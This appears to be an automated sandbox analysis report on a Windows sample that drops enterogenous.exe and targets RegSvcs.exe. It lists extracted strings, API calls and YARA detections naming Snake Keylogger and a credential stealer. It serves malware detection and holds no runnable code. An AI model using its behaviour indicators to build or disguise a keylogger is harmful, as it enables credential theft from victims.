Source: ty1nyFUMlo.exe, 00000000.00000000.1343887602.00000000005D2000.00000002.00000001.01000000.00000003.sdmp | String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer | memstr_971ccf92-4
Source: enterogenous.exe | String found in binary or memory: This is a third-party compiled AutoIt script.
Source: enterogenous.exe, 00000002.00000002.1407526648.0000000000AF2000.00000002.00000001.01000000.00000004.sdmp | String found in binary or memory: This is a third-party compiled AutoIt script. | memstr_c2342c4b-f
Source: enterogenous.exe, 00000002.00000002.1407526648.0000000000AF2000.00000002.00000001.01000000.00000004.sdmp | String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer | memstr_246e6e1d-f
Source: enterogenous.exe, 00000006.00000002.1565408285.0000000000AF2000.00000002.00000001.01000000.00000004.sdmp | String found in binary or memory: This is a third-party compiled AutoIt script. | memstr_2ce99d2f-2
Source: enterogenous.exe, 00000006.00000002.1565408285.0000000000AF2000.00000002.00000001.01000000.00000004.sdmp | String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer | memstr_ae0ea951-8
Source: ty1nyFUMlo.exe | String found in binary or memory: This is a third-party compiled AutoIt script. | memstr_cca75cd1-b
Source: ty1nyFUMlo.exe | String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer | memstr_cf886f48-3
Source: enterogenous.exe.0.dr | String found in binary or memory: This is a third-party compiled AutoIt script. | memstr_a43ab9a3-8
Source: enterogenous.exe.0.dr | String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer | memstr_bb1ec916-0
Source: C:\Windows\System32\wscript.exe | COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
Source: C:\Users\user\Desktop\ty1nyFUMlo.exe | Code function: 0_2_0057D5EB: CreateFileW,DeviceIoControl,CloseHandle
Source: C:\Users\user\Desktop\ty1nyFUMlo.exe | Code function: 0_2_00571201 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock
Source: C:\Users\user\Desktop\ty1nyFUMlo.exe | Code function: 0_2_0057E8F6 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState
Source: C:\Users\user\AppData\Local\translucently\enterogenous.exe | Code function: 2_2_00A9E8F6 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState
Source: C:\Users\user\Desktop\ty1nyFUMlo.exe | Code function: 0_2_0051BF40
Source: C:\Users\user\Desktop\ty1nyFUMlo.exe | Code function: 0_2_00582046
Source: C:\Users\user\Desktop\ty1nyFUMlo.exe | Code function: 0_2_00518060
Source: C:\Users\user\Desktop\ty1nyFUMlo.exe | Code function: 0_2_00578298
Source: C:\Users\user\Desktop\ty1nyFUMlo.exe | Code function: 0_2_0054E4FF
Source: C:\Users\user\Desktop\ty1nyFUMlo.exe | Code function: 0_2_0054676B
Source: C:\Users\user\Desktop\ty1nyFUMlo.exe | Code function: 0_2_005A4873
Source: C:\Users\user\Desktop\ty1nyFUMlo.exe | Code function: 0_2_0051CAF0
Source: C:\Users\user\Desktop\ty1nyFUMlo.exe | Code function: 0_2_0053CAA0
Source: C:\Users\user\Desktop\ty1nyFUMlo.exe | Code function: 0_2_0052CC39
Source: C:\Users\user\Desktop\ty1nyFUMlo.exe | Code function: 0_2_00546DD9
Source: C:\Users\user\Desktop\ty1nyFUMlo.exe | Code function: 0_2_0052B119
Source: C:\Users\user\Desktop\ty1nyFUMlo.exe | Code function: 0_2_005191C0
Source: C:\Users\user\Desktop\ty1nyFUMlo.exe | Code function: 0_2_00531394
Source: C:\Users\user\Desktop\ty1nyFUMlo.exe | Code function: 0_2_00531706
Source: C:\Users\user\Desktop\ty1nyFUMlo.exe | Code function: 0_2_0053781B
Source: C:\Users\user\Desktop\ty1nyFUMlo.exe | Code function: 0_2_0052997D
Source: C:\Users\user\Desktop\ty1nyFUMlo.exe | Code function: 0_2_00517920
Source: C:\Users\user\Desktop\ty1nyFUMlo.exe | Code function: 0_2_005319B0
Source: C:\Users\user\Desktop\ty1nyFUMlo.exe | Code function: 0_2_00537A4A
Source: C:\Users\user\Desktop\ty1nyFUMlo.exe | Code function: 0_2_00531C77
Source: C:\Users\user\Desktop\ty1nyFUMlo.exe | Code function: 0_2_00537CA7
Source: C:\Users\user\Desktop\ty1nyFUMlo.exe | Code function: 0_2_0059BE44
Source: C:\Users\user\Desktop\ty1nyFUMlo.exe | Code function: 0_2_00549EEE
Source: C:\Users\user\Desktop\ty1nyFUMlo.exe | Code function: 0_2_00531F32
Source: C:\Users\user\Desktop\ty1nyFUMlo.exe | Code function: 0_2_01721E80
Source: C:\Users\user\AppData\Local\translucently\enterogenous.exe | Code function: 2_2_00A38060
Source: C:\Users\user\AppData\Local\translucently\enterogenous.exe | Code function: 2_2_00AA2046
Source: C:\Users\user\AppData\Local\translucently\enterogenous.exe | Code function: 2_2_00A98298
Source: C:\Users\user\AppData\Local\translucently\enterogenous.exe | Code function: 2_2_00A6E4FF
Source: C:\Users\user\AppData\Local\translucently\enterogenous.exe | Code function: 2_2_00A6676B
Source: C:\Users\user\AppData\Local\translucently\enterogenous.exe | Code function: 2_2_00AC4873
Source: C:\Users\user\AppData\Local\translucently\enterogenous.exe | Code function: 2_2_00A5CAA0
Source: C:\Users\user\AppData\Local\translucently\enterogenous.exe | Code function: 2_2_00A3CAF0
Source: C:\Users\user\AppData\Local\translucently\enterogenous.exe | Code function: 2_2_00A4CC39
Source: C:\Users\user\AppData\Local\translucently\enterogenous.exe | Code function: 2_2_00A66DD9
Source: C:\Users\user\AppData\Local\translucently\enterogenous.exe | Code function: 2_2_00A4D064
Source: C:\Users\user\AppData\Local\translucently\enterogenous.exe | Code function: 2_2_00A391C0
Source: C:\Users\user\AppData\Local\translucently\enterogenous.exe | Code function: 2_2_00A4B119
Source: C:\Users\user\AppData\Local\translucently\enterogenous.exe | Code function: 2_2_00A51394
Source: C:\Users\user\AppData\Local\translucently\enterogenous.exe | Code function: 2_2_00A51706
Source: C:\Users\user\AppData\Local\translucently\enterogenous.exe | Code function: 2_2_00A5781B
Source: C:\Users\user\AppData\Local\translucently\enterogenous.exe | Code function: 2_2_00A519B0
Source: C:\Users\user\AppData\Local\translucently\enterogenous.exe | Code function: 2_2_00A37920
Source: C:\Users\user\AppData\Local\translucently\enterogenous.exe | Code function: 2_2_00A4997D
Source: C:\Users\user\AppData\Local\translucently\enterogenous.exe | Code function: 2_2_00A57A4A
Source: C:\Users\user\AppData\Local\translucently\enterogenous.exe | Code function: 2_2_00A57CA7
Source: C:\Users\user\AppData\Local\translucently\enterogenous.exe | Code function: 2_2_00A51C77
Source: C:\Users\user\AppData\Local\translucently\enterogenous.exe | Code function: 2_2_00A69EEE
Source: C:\Users\user\AppData\Local\translucently\enterogenous.exe | Code function: 2_2_00ABBE44
Source: C:\Users\user\AppData\Local\translucently\enterogenous.exe | Code function: 2_2_00A51F32
Source: C:\Users\user\AppData\Local\translucently\enterogenous.exe | Code function: 2_2_016300D8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_030D5362
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_030DD278
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_030D7118
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_030DC148
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_030DA088
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_030DC738
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_030DC468
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_030DCA08
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_030DE988
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_030D69B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_030DCFA9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_030DCCD8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_030DF961
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_030DE97B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_030D29E0
Source: C:\Users\user\AppData\Local\translucently\enterogenous.exe | Code function: 6_2_0174D0C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_01927118
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_0192C148
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_01925362
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_0192D278
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_0192C468
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_0192C738
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_0192E988
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_019269B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_0192CA08
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_01929DE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_0192CCD8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_0192CFA9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_019229E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_0192F970
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_0192E97B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_01923E18
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_06C71E80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_06C7E6B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_06C717A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_06C7FC68
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_06C79C18
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_06C79548
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_06C70B30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_06C75028
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_06C72968
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_06C7E6AF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_06C71E70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_06C7DE00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_06C7178F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_06C7EF51
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_06C7EF60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_06C7CCA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_06C7DDFF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_06C7D550
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_06C7E257
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_06C7E258
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_06C78BA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_06C7F3B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_06C7EB08
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_06C70B20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_06C7D0F8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_06C70040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_06C7F810
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_06C7501E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_06C70031
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_06C7D9A7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_06C7D9A8
Source: C:\Users\user\AppData\Local\translucently\enterogenous.exe | Code function: String function: 00A4F9F2 appears 40 times
Source: C:\Users\user\AppData\Local\translucently\enterogenous.exe | Code function: String function: 00A39CB3 appears 31 times
Source: C:\Users\user\AppData\Local\translucently\enterogenous.exe | Code function: String function: 00A50A30 appears 46 times
Source: C:\Users\user\AppData\Local\translucently\enterogenous.exe | Code function: String function: 00A54963 appears 31 times
Source: C:\Users\user\Desktop\ty1nyFUMlo.exe | Code function: String function: 0052F9F2 appears 40 times
Source: C:\Users\user\Desktop\ty1nyFUMlo.exe | Code function: String function: 00534963 appears 31 times
Source: C:\Users\user\Desktop\ty1nyFUMlo.exe | Code function: String function: 00530A30 appears 46 times
Source: C:\Users\user\Desktop\ty1nyFUMlo.exe | Code function: String function: 00519CB3 appears 31 times
Source: ty1nyFUMlo.exe | Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
Source: 6.2.enterogenous.exe.3b50000.1.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 6.2.enterogenous.exe.3b50000.1.raw.unpack, type: UNPACKEDPE | Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 6.2.enterogenous.exe.3b50000.1.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 6.2.enterogenous.exe.3b50000.1.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 6.2.enterogenous.exe.3b50000.1.unpack, type: UNPACKEDPE | Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 6.2.enterogenous.exe.3b50000.1.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 3.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 3.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 3.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 2.2.enterogenous.exe.4370000.1.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
